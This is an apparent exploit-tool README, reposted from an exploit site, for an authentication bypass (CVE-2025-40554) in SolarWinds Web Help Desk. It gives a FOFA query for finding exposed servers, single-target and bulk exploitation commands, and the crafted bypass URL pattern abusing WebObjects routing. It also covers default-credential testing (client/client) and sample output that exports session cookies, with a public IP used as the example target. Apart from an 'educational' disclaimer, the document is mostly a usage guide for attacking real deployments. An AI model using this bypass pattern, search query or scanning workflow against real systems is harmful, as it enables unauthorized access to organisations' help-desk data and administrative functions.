Share
## https://sploitus.com/exploit?id=82AE125C-F8B2-557A-B17E-276AE30B868C
# CVE-2025-40554 Exploitation Suite
A comprehensive security testing tool for detecting and exploiting the authentication bypass vulnerability (CVE-2025-40554 / CVE-2025-40536) in SolarWinds Web Help Desk.
## โ ๏ธ Disclaimer
**FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY**
This tool is provided for security research, penetration testing, and vulnerability assessment on systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal. The authors are not responsible for misuse or damage caused by this tool.
## ๐ Vulnerability Overview
**CVE-2025-40554** is a critical authentication bypass vulnerability in SolarWinds Web Help Desk that allows unauthenticated attackers to:
- Bypass authentication mechanisms
- Access privileged administrative functions (Authentication)
- Enumerate system configuration
### Affected Versions
- SolarWinds Web Help Desk (specific version information should be verified)
- Check SolarWinds security advisories for patched versions
## ๐ Features
Check by your self :))
**Dependencies:**
- Python 3.6+
- requests library
- urllib3 library
## ๐ ๏ธ Installation
```bash
# Clone or download the script
wget https://raw.githubusercontent.com/username/repo/main/CVE-2025-40554.py
# Make executable
chmod +x CVE-2025-40554.py
```
## ๐ FOFA
```
("Web Help Desk") && (icon_hash="1895809524" || icon_hash="804130677")
```
## ๐ Usage
### Basic Scan (Single Target)
```bash
# Simple vulnerability check
python3 CVE-2025-40554.py -t https://target:8443
# With explicit protocol
python3 CVE-2025-40554.py -t https://203.106.221.203:8443
```
### Full Exploitation Mode
```bash
# Complete exploitation with session enumeration
python3 CVE-2025-40554.py -t https://target:8443 --exploit
# Skip default credential testing
python3 CVE-2025-40554.py -t https://target:8443 --exploit --no-login
```
### Bulk Scanning
```bash
# Scan multiple targets from file
python3 CVE-2025-40554.py -l targets.txt
# Bulk scan with exploitation
python3 CVE-2025-40554.py -l targets.txt --exploit
# Quiet mode (minimal output)
python3 CVE-2025-40554.py -l targets.txt -q
# Custom output file
python3 CVE-2025-40554.py -l targets.txt -o results.txt
```
### Target File Format
**targets.txt:**
```
https://target1:8443
https://target2.example.com:8443
192.168.1.100:8443
target3.local:8443
# Comments are supported
```
## ๐ฏ Command Line Options
| Option | Description |
|--------|-------------|
| `-t, --target URL` | Single target URL to test |
| `-l, --list FILE` | File containing list of targets (one per line) |
| `--exploit` | Enable full exploitation mode with enumeration |
| `--no-login` | Skip default credential testing |
| `-o, --output FILE` | Output file for vulnerable targets (default: vulnerable_targets.txt) |
| `-q, --quiet` | Minimal output mode (useful for bulk scans) |
## ๐ Output Examples
### Successful Exploitation
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE-2025-40554 - SolarWinds Web Help Desk โ
โ Authentication Bypass Exploitation Tool โ
โ Research & Educational Purposes Only โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
======================================================================
Target: https://203.106.221.203:8443
======================================================================
[*] Step 1: Establishing session...
[+] WOSID extracted: AbCdEfGhIjKlMnOpQrStU
[+] XSRF token: abc123-def456-ghi789
[*] Step 2: Testing authentication bypass...
[+] Found bypass indicators: externalAuthContainer, JSONRpcClient, SAML 2.0
[+] VULNERABLE - Auth bypass confirmed!
[*] Step 3: Testing default credentials (client/client)...
[+] SUCCESS - Default credentials work!
======================================================================
EXPLOITATION MODE - CVE-2025-40554 Auth Bypass
======================================================================
[*] Bypass URL: https://203.106.221.203:8443/helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/AbCdEfGhIjKlMnOpQrStU/1.0?badparam=/ajax/&wopage=LoginPref
[*] Triggering authentication bypass...
[+] Auth bypass successful!
[*] Session Cookies:
wosid = AbCdEfGhIjKlMnOpQrStU
XSRF-TOKEN = abc123-def456-ghi789
======================================================================
SUMMARY
======================================================================
[+] Target is VULNERABLE to CVE-2025-40554
[+] Default credentials: WORK
======================================================================
```
### Bulk Scan Results
```
[*] Loaded 5 unique targets from targets.txt
[*] Mode: Bypass + default credential test
[*] Full exploitation enabled
[1/5] Testing https://target1:8443
[+] VULNERABLE - Auth bypass confirmed!
[+] SUCCESS - Default credentials work!
[2/5] Testing https://target2:8443
[!] NOT VULNERABLE - Auth bypass failed
...
======================================================================
SCAN SUMMARY
======================================================================
Total scanned: 5/5
Vulnerable: 2
With def. creds: 1
======================================================================
[+] Results saved to: vulnerable_targets.txt
```
## ๐ง Technical Details
### Exploitation Flow
1. **Session Establishment**
- Connects to WHD instance
- Extracts WOSID (WebObjects Session ID) from multiple sources
- Captures XSRF token if present
2. **Authentication Bypass**
- Crafts malicious URL with WOSID injection
- Exploits path traversal in WebObjects routing
- Bypasses authentication checks
3. **Credential Testing** (optional)
- Parses login form with CSRF protection
- Tests default credentials (client/client)
- Validates successful authentication
4. **Full Exploitation** (--exploit mode)
- Exports session cookies
### Vulnerability Indicators
The tool detects successful bypass by checking for:
- `externalAuthContainer` - External auth configuration
- `JSONRpcClient` - API client exposure
- `SAML 2.0` - SSO configuration
- `LoginPref` - Login preference settings
- `authMode` - Authentication mode settings
## ๐ค Contributing
Contributions are welcome.....
## ๐ References
- [CVE-2025-40554 Details](https://vulners.com/cve/CVE-2025-40554)
- [CVE-2025-40536 Details](https://vulners.com/cve/CVE-2025-40536)
- [SolarWinds Security Advisories](https://www.solarwinds.com/trust-center/security-advisories)
- WebObjects Framework Documentation
## ๐ License
This tool is provided "as is" without warranty of any kind. Use at your own risk.
## ๐ค Author
Skynoxk
---
**Remember: Always hack ethically and legally. Unauthorized access is a crime.**